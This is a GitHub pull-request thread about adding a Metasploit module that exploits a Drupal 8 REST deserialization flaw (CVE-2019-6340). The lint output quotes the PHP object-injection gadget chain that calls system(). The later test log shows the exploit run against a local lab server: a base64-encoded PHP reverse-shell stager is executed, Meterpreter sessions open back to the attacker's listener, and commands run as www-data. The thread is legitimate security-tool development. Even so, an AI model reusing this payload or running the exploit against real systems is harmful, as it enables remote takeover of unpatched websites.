Add Drupal SA-CORE-2019-003 (CVE-2019-6340)

[rotemreiss]

Add new exploit for Drupal SA-CORE-2019-003.

This is my first Metasploit exploit so be gentle with me ;)

#7108, #9876

[bcoles]

Please add some module documentation for this module.

• Template
• Examples

[bcoles]

msftidy is unhappy and complained a lot. It's nothing personal. msftidy never has anything nice to say.

$ ./.git/hooks/post-merge
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:97 - [WARNING] Spaces at EOL
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:110 - [WARNING] Spaces at EOL
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:110 - [WARNING] Tabbed indent: "\t\tprint_error \"Exploit failed, in case that VHOST was not defined, consider to set that option\" \t\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:128 - [WARNING] Space-Tab mixed indent: " \thost = \"\#{datastore['VHOST']}\" || \"\#{rhost}\"\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:129 - [WARNING] Space-Tab mixed indent: " \tif !datastore['VHOST']\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:130 - [WARNING] Space-Tab mixed indent: " \t\tprint_warning \"The exploit may not work when using IP instead of host name, consider to set VHOST option\"\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:131 - [WARNING] Space-Tab mixed indent: " \tend\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:152 - [WARNING] Space-Tab mixed indent: "\t \"link\" => [\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:152 - [WARNING] Tabbed indent: "\t \"link\" => [\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:153 - [WARNING] Space-Tab mixed indent: "\t {\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:153 - [WARNING] Tabbed indent: "\t {\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:154 - [WARNING] Space-Tab mixed indent: "\t \"value\" => \"link\",\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:154 - [WARNING] Tabbed indent: "\t \"value\" => \"link\",\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:155 - [WARNING] Space-Tab mixed indent: "\t \"options\" => \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:\#{cmd_len}:\\\"\#{cmd}\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:155 - [WARNING] Tabbed indent: "\t \"options\" => \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:\#{cmd_len}:\\\"\#{cmd}\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:156 - [WARNING] Space-Tab mixed indent: "\t }\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:156 - [WARNING] Tabbed indent: "\t }\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:157 - [WARNING] Space-Tab mixed indent: "\t ],\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:157 - [WARNING] Tabbed indent: "\t ],\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:158 - [WARNING] Space-Tab mixed indent: "\t \"_links\" => {\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:158 - [WARNING] Tabbed indent: "\t \"_links\" => {\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:159 - [WARNING] Space-Tab mixed indent: "\t \"type\" => {\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:159 - [WARNING] Tabbed indent: "\t \"type\" => {\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:160 - [WARNING] Space-Tab mixed indent: "\t \"href\" => \"\#{vhost_full_uri}rest/type/shortcut/default\"\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:160 - [WARNING] Tabbed indent: "\t \"href\" => \"\#{vhost_full_uri}rest/type/shortcut/default\"\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:161 - [WARNING] Space-Tab mixed indent: "\t }\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:161 - [WARNING] Tabbed indent: "\t }\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:162 - [WARNING] Space-Tab mixed indent: "\t }\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:162 - [WARNING] Tabbed indent: "\t }\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:163 - [WARNING] Tabbed indent: "\t}\n"
------------------------------------------------------------------------
------------------------------------------------------------------------
[*] This merge contains modules failing msftidy.rb
[*] Please fix this if you intend to publish these
[*] modules to a popular metasploit-framework repo
------------------------------------------------------------------------

[busterb]

Nice first try! There are a good number of improvements you should make, along with some module documentation, etc. I'd suggest starting with an empty module, and only add the code you need from examples. That'll help you understand better how all the pieces work together.

Our local analysis of this vulnerability made it seem like too much of a stretch to see the specific circumstances required for exploitability being very readily expressed in the wild, so we didn't attempt to create a module locally. Feel free to open a new PR for this when you think it is ready.

Thanks!

[rotemreiss]

Our local analysis of this vulnerability made it seem like too much of a stretch to see the specific circumstances required for exploitability being very readily expressed in the wild, so we didn't attempt to create a module locally. Feel free to open a new PR for this when you think it is ready.

@busterb By that you mean that the exploit isn't "bullet-proof" / reliable enough or something else?
I've already invested lot of my time in that, so I'm wondering if I can complete those fixes listed above and then it will be merged?
It is indeed not 100% bullet proof, especially because of the rest endpoints, but it is impossible to cover all the exploitation options, so this is why I took the node one, which is the most common one in use (trust me that I know Drupal..). I think that this should be covered on my documentation but not more than that.

The code in that new module is mostly after I removed / fixed things that are irrelevant or seems to much complicated for that use case. (e.g. the drupal_version) If you think that I missed something, I'll be glad to learn from you guys and hopefully to contribute more modules in the future.

@wvu-r7 BTW I am insulted that you didn't give us credit in your Drupalgeddon 2 module 😜

[wvu]

metasploit-framework/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb

Line 34 in 8d069e4

['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],

Credit right here. Normally we put vuln discovery, PoC, and module authors in the Author field.

If you'd like to be added as an author, I'd be happy to, but I worked off the PoCs directly. Relevant independent analysis (such as the greysec.net thread) was referenced. That said, your blog post was a great read!

[wvu]

@rotemreiss: I would be happy to merge the module if the review comments are addressed, the requirements and limitations on the vuln are noted (all Web Services enabled and per-node caching), and documentation is added!

You can continue to push commits here, and when you're ready to reopen, just ping us!

[wvu]

Since we've accumulated some history here, let's reopen this so we can track it instead of having to reference it. I apologize for the misdirection!

[wvu]

@rotemreiss: You'll want to rebase against incorporate the changes from master now that #11483 has merged. I have another PR coming for full_uri, so it's best to wait for that to rebase or merge master.

[rotemreiss]

@wvu-r7 Cool, I'll try that after you'll make your changes. I'm glad that I understood the framework ok and it wasn't me reinventing the wheel.
Anyway I've completed the fixes + added some improvements.
I also ran msftidy which is now seems clean (hopefully I didn't miss a configuration flag or something like that).
Everything was also tested once again on some positive and negative flows.

In the beginning I thought that it will take me ~3 hours.. I think I spent something like a day an a half on that :S . If you can merge it before your full_uri fix it will also be great and I promise to change my code afterwards (merging all that work will make me full good 😉 )

[wvu]

I merged #11485, since I don't like module PRs blocking library changes. You can still change your code later, or I can handle it when I do testing and final cleanup.

[rotemreiss]

I merged #11485, since I don't like module PRs blocking library changes. You can still change your code later, or I can handle it when I do testing and final cleanup.

I can take care of it, I'll just make the changes you did on #11485 manually on my env, since I'm on the latest release here I think.
Will be pushed in a few..

[rotemreiss]

Changed, tested and pushed ;) Let's make it happen?

[h00die]

This is not the right place for it, but i just wanted to say awesome job team. While I'm not keeping up on all the emails, everyone seems to be putting in a lot of work and really working hard to make this happen. While I dont have an immediate need for the module, let me be the first in the community to say thanks for working so hard to make this module happen!

[wvu]

@rotemreiss: Can you give the module a test? I'm ready to land when you are.

[wvu]

drupal_restws_unserialize tested

msf5 > use exploit/unix/webapp/drupal_restws_unserialize
msf5 exploit(unix/webapp/drupal_restws_unserialize) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/webapp/drupal_restws_unserialize) > set lhost 192.168.1.2
lhost => 192.168.1.2
msf5 exploit(unix/webapp/drupal_restws_unserialize) > options

Module options (exploit/unix/webapp/drupal_restws_unserialize):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   METHOD     POST             yes       HTTP method to use (Accepted: GET, POST, PATCH, PUT)
   NODE       1                no        Node ID to target with GET method
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Path to Drupal install
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP In-Memory


msf5 exploit(unix/webapp/drupal_restws_unserialize) > check

[*] Drupal 8 targeted at http://127.0.0.1/
[!] CHANGELOG.txt no longer contains patch level
[*] Executing with system(): echo uAteSs3llS
[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
[+] Drupal is vulnerable to code execution
[+] 127.0.0.1:80 - The target is vulnerable.
msf5 exploit(unix/webapp/drupal_restws_unserialize) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Drupal 8 targeted at http://127.0.0.1/
[!] CHANGELOG.txt no longer contains patch level
[*] Executing with system(): echo O9wsGkTcUmN1Xexv3nKbhoZjJpLGbwwJm2HmR
[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
[+] Drupal is vulnerable to code execution
[*] Executing with system(): php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMS4yJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNrKCJO.bGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
[*] Sending stage (38247 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:56144) at 2019-03-05 20:26:14 -0600

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : 11f5c33da9ec
OS          : Linux 11f5c33da9ec 4.9.93-linuxkit-aufs #1 SMP Wed Jun 6 16:55:56 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >
Background session 1? [y/N]
msf5 exploit(unix/webapp/drupal_restws_unserialize) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Drupal 8 targeted at http://127.0.0.1/
[!] CHANGELOG.txt no longer contains patch level
[*] Executing with system(): echo mir4I1UtJNUJpKxfXnt5gPzM1N7I
[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
[+] Drupal is vulnerable to code execution
[*] Executing with system(): php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMS4yJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNrKCJO.bGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
[*] Sending stage (38247 bytes) to 192.168.1.2
[*] Meterpreter session 2 opened (192.168.1.2:4444 -> 192.168.1.2:56151) at 2019-03-05 20:26:28 -0600

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : 11f5c33da9ec
OS          : Linux 11f5c33da9ec 4.9.93-linuxkit-aufs #1 SMP Wed Jun 6 16:55:56 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >
Background session 2? [y/N]
msf5 exploit(unix/webapp/drupal_restws_unserialize) > set target Unix In-Memory
target => Unix In-Memory
msf5 exploit(unix/webapp/drupal_restws_unserialize) > run

[*] Drupal 8 targeted at http://127.0.0.1/
[!] CHANGELOG.txt no longer contains patch level
[*] Executing with system(): echo vFfWmcG4YE9Kz8s0S9k1XqtrPZX
[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
[+] Drupal is vulnerable to code execution
[!] Enabling DUMP_OUTPUT for cmd/unix/generic
[*] Executing with system(): id
[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
{"message":"No authentication credentials provided."}uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] Exploit completed, but no session was created.
msf5 exploit(unix/webapp/drupal_restws_unserialize) > set method GET
method => GET
msf5 exploit(unix/webapp/drupal_restws_unserialize) > check

[*] Drupal 8 targeted at http://127.0.0.1/
[!] CHANGELOG.txt no longer contains patch level
[*] 127.0.0.1:80 - The target service is running, but could not be validated.
msf5 exploit(unix/webapp/drupal_restws_unserialize) > run

[*] Drupal 8 targeted at http://127.0.0.1/
[!] CHANGELOG.txt no longer contains patch level
[!] Enabling DUMP_OUTPUT for cmd/unix/generic
[*] Executing with system(): id
[*] Sending GET to /node/1 with link http://127.0.0.1/rest/type/shortcut/default
{"_links":{"self":{"href":"http:\/\/127.0.0.1\/articles\/give-it-a-go-and-grow-your-own-herbs?_format=hal_json"},"type":{"href":"http:\/\/127.0.0.1\/rest\/type\/node\/article"},"http:\/\/127.0.0.1\/rest\/relation\/node\/article\/revision_uid":[{"href":"http:\/\/127.0.0.1\/user\/4?_format=hal_json"}],"http:\/\/127.0.0.1\/rest\/relation\/node\/article\/uid":[{"href":"http:\/\/127.0.0.1\/user\/4?_format=hal_json","lang":"en"}],"http:\/\/127.0.0.1\/rest\/relation\/node\/article\/field_image":[{"href":"http:\/\/127.0.0.1\/sites\/default\/files\/home-grown-herbs.jpg","lang":"en"}],"http:\/\/127.0.0.1\/rest\/relation\/node\/article\/field_tags":[{"href":"http:\/\/127.0.0.1\/tags\/grow-your-own?_format=hal_json","lang":"en"},{"href":"http:\/\/127.0.0.1\/tags\/seasonal?_format=hal_json","lang":"en"},{"href":"http:\/\/127.0.0.1\/tags\/herbs?_format=hal_json","lang":"en"}]},"nid":[{"value":1}],"uuid":[{"value":"19f125cf-a5e0-40ad-bf40-dce4e89a876b"}],"vid":[{"value":1}],"langcode":[{"value":"en","lang":"en"}],"type":[{"target_id":"article"}],"revision_timestamp":[{"value":"2019-03-05T22:29:14+00:00","format":"Y-m-d\\TH:i:sP"}],"_embedded":{"http:\/\/127.0.0.1\/rest\/relation\/node\/article\/revision_uid":[{"_links":{"self":{"href":"http:\/\/127.0.0.1\/user\/4?_format=hal_json"},"type":{"href":"http:\/\/127.0.0.1\/rest\/type\/user\/user"}},"uuid":[{"value":"73ad2793-feab-42c3-a61f-8d21851d1a4f"}]}],"http:\/\/127.0.0.1\/rest\/relation\/node\/article\/uid":[{"_links":{"self":{"href":"http:\/\/127.0.0.1\/user\/4?_format=hal_json"},"type":{"href":"http:\/\/127.0.0.1\/rest\/type\/user\/user"}},"uuid":[{"value":"73ad2793-feab-42c3-a61f-8d21851d1a4f"}],"lang":"en"}],"http:\/\/127.0.0.1\/rest\/relation\/node\/article\/field_image":[{"_links":{"self":{"href":"http:\/\/127.0.0.1\/sites\/default\/files\/home-grown-herbs.jpg"},"type":{"href":"http:\/\/127.0.0.1\/rest\/type\/file\/file"}},"uuid":[{"value":"ecd49c10-3ced-4f40-bdf9-dc92ff407385"}],"lang":"en"}],"http:\/\/127.0.0.1\/rest\/relation\/node\/article\/field_tags":[{"_links":{"self":{"href":"http:\/\/127.0.0.1\/tags\/grow-your-own?_format=hal_json"},"type":{"href":"http:\/\/127.0.0.1\/rest\/type\/taxonomy_term\/tags"}},"uuid":[{"value":"85897974-8b69-420d-a528-24fc44440672"}],"lang":"en"},{"_links":{"self":{"href":"http:\/\/127.0.0.1\/tags\/seasonal?_format=hal_json"},"type":{"href":"http:\/\/127.0.0.1\/rest\/type\/taxonomy_term\/tags"}},"uuid":[{"value":"ce1a8796-a4ad-40a7-85cd-0850b4777d96"}],"lang":"en"},{"_links":{"self":{"href":"http:\/\/127.0.0.1\/tags\/herbs?_format=hal_json"},"type":{"href":"http:\/\/127.0.0.1\/rest\/type\/taxonomy_term\/tags"}},"uuid":[{"value":"3a2ee720-fba0-4dc8-b53f-f4cf5fc6e3a7"}],"lang":"en"}]},"status":[{"value":true,"lang":"en"}],"title":[{"value":"Give it a go and grow your own herbs","lang":"en"}],"created":[{"value":"2019-03-05T22:29:14+00:00","lang":"en","format":"Y-m-d\\TH:i:sP"}],"changed":[{"value":"2019-03-05T22:29:14+00:00","lang":"en","format":"Y-m-d\\TH:i:sP"}],"promote":[{"value":true,"lang":"en"}],"sticky":[{"value":false,"lang":"en"}],"default_langcode":[{"value":true,"lang":"en"}],"revision_translation_affected":[{"value":true,"lang":"en"}],"moderation_state":[{"value":"published","lang":"en"}],"path":[{"alias":"\/articles\/give-it-a-go-and-grow-your-own-herbs","pid":4,"langcode":"en","lang":"en"}],"body":[{"value":"\u003Cp\u003EThere\u0027s nothing like having your own supply of fresh herbs, readily available and close at hand to use while cooking. Whether you have a large garden or a small kitchen window sill, there\u0027s always enough room for something home grown.\u003C\/p\u003E\n\u003Ch2\u003EOutdoors\u003C\/h2\u003E\n\u003Ch3\u003EMint\u003C\/h3\u003E\n\u003Cp\u003EMint is a great plant to grow as it\u0027s hardy and can grow in almost any soil. Mint can grow wild, so keep it contained in a pot or it might spread and take over your whole garden.\u003C\/p\u003E\n\u003Ch3\u003ESage\u003C\/h3\u003E\n\u003Cp\u003ELike mint, sage is another prolific growing plant and will take over your garden if you let it. Highly aromatic, the sage plant can be planted in a pot or flower bed in well drained soil. The best way to store the herb is to sun dry the leaves and store in a cool, dark cupboard in a sealed container.\u003C\/p\u003E\n\u003Ch3\u003ERosemary\u003C\/h3\u003E\n\u003Cp\u003ERosemary plants grow into lovely shrubs. Easily grown from cuttings, rosemary plants do not like freezing temperatures so keep pots or planted bushes near the home to shelter them from the cold. It grows well in pots as it likes dry soil, but can survive well in the ground too. If pruning rosemary to encourage it into a better shape, save the branches and hang them upside down to preserve the flavor and use in food.\u003C\/p\u003E\n\u003Ch2\u003EIndoors\u003C\/h2\u003E\n\u003Ch3\u003EBasil\u003C\/h3\u003E\n\u003Cp\u003EPerfect in sunny spot on a kitchen window sill. Basil is an annual plant, so will die off in the autumn, so it\u0027s a good idea to harvest it in the summer if you have an abundance and dry it. Picked basil stays fresh longer if it is placed in water (like fresh flowers). A great way to store basil is to make it into pesto!\u003C\/p\u003E\n\u003Ch3\u003EChives\u003C\/h3\u003E\n\u003Cp\u003EA versatile herb, chives can grow well indoors. Ensure the plant is watered well, and gets plenty of light. Remember to regularly trim the chives. This prevents the flowers from developing and encourages new growth.\u003C\/p\u003E\n\u003Ch3\u003ECoriander (Cilantro)\u003C\/h3\u003E\n\u003Cp\u003ECoriander can grow indoors, but unlike the other herbs, it doesn\u0027t like full sun. If you have a south facing kitchen window, this isn\u0027t the place for it. Although not as thirsty as basil, coriander doesn\u0027t like dry soil so don\u0027t forget to water it! Cut coriander is best stored in the fridge.\u003C\/p\u003E\n","format":"basic_html","processed":"\u003Cp\u003EThere\u0027s nothing like having your own supply of fresh herbs, readily available and close at hand to use while cooking. Whether you have a large garden or a small kitchen window sill, there\u0027s always enough room for something home grown.\u003C\/p\u003E\n\u003Ch2\u003EOutdoors\u003C\/h2\u003E\n\u003Ch3\u003EMint\u003C\/h3\u003E\n\u003Cp\u003EMint is a great plant to grow as it\u0027s hardy and can grow in almost any soil. Mint can grow wild, so keep it contained in a pot or it might spread and take over your whole garden.\u003C\/p\u003E\n\u003Ch3\u003ESage\u003C\/h3\u003E\n\u003Cp\u003ELike mint, sage is another prolific growing plant and will take over your garden if you let it. Highly aromatic, the sage plant can be planted in a pot or flower bed in well drained soil. The best way to store the herb is to sun dry the leaves and store in a cool, dark cupboard in a sealed container.\u003C\/p\u003E\n\u003Ch3\u003ERosemary\u003C\/h3\u003E\n\u003Cp\u003ERosemary plants grow into lovely shrubs. Easily grown from cuttings, rosemary plants do not like freezing temperatures so keep pots or planted bushes near the home to shelter them from the cold. It grows well in pots as it likes dry soil, but can survive well in the ground too. If pruning rosemary to encourage it into a better shape, save the branches and hang them upside down to preserve the flavor and use in food.\u003C\/p\u003E\n\u003Ch2\u003EIndoors\u003C\/h2\u003E\n\u003Ch3\u003EBasil\u003C\/h3\u003E\n\u003Cp\u003EPerfect in sunny spot on a kitchen window sill. Basil is an annual plant, so will die off in the autumn, so it\u0027s a good idea to harvest it in the summer if you have an abundance and dry it. Picked basil stays fresh longer if it is placed in water (like fresh flowers). A great way to store basil is to make it into pesto!\u003C\/p\u003E\n\u003Ch3\u003EChives\u003C\/h3\u003E\n\u003Cp\u003EA versatile herb, chives can grow well indoors. Ensure the plant is watered well, and gets plenty of light. Remember to regularly trim the chives. This prevents the flowers from developing and encourages new growth.\u003C\/p\u003E\n\u003Ch3\u003ECoriander (Cilantro)\u003C\/h3\u003E\n\u003Cp\u003ECoriander can grow indoors, but unlike the other herbs, it doesn\u0027t like full sun. If you have a south facing kitchen window, this isn\u0027t the place for it. Although not as thirsty as basil, coriander doesn\u0027t like dry soil so don\u0027t forget to water it! Cut coriander is best stored in the fridge.\u003C\/p\u003E\n","summary":null,"lang":"en"}]}uid=33(www-data) gid=33(www-data) groups=33(www-data)

[!] If you did not get code execution, try a new node ID
[*] Exploit completed, but no session was created.
msf5 exploit(unix/webapp/drupal_restws_unserialize) > set target PHP In-Memory
target => PHP In-Memory
msf5 exploit(unix/webapp/drupal_restws_unserialize) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Drupal 8 targeted at http://127.0.0.1/
[!] CHANGELOG.txt no longer contains patch level
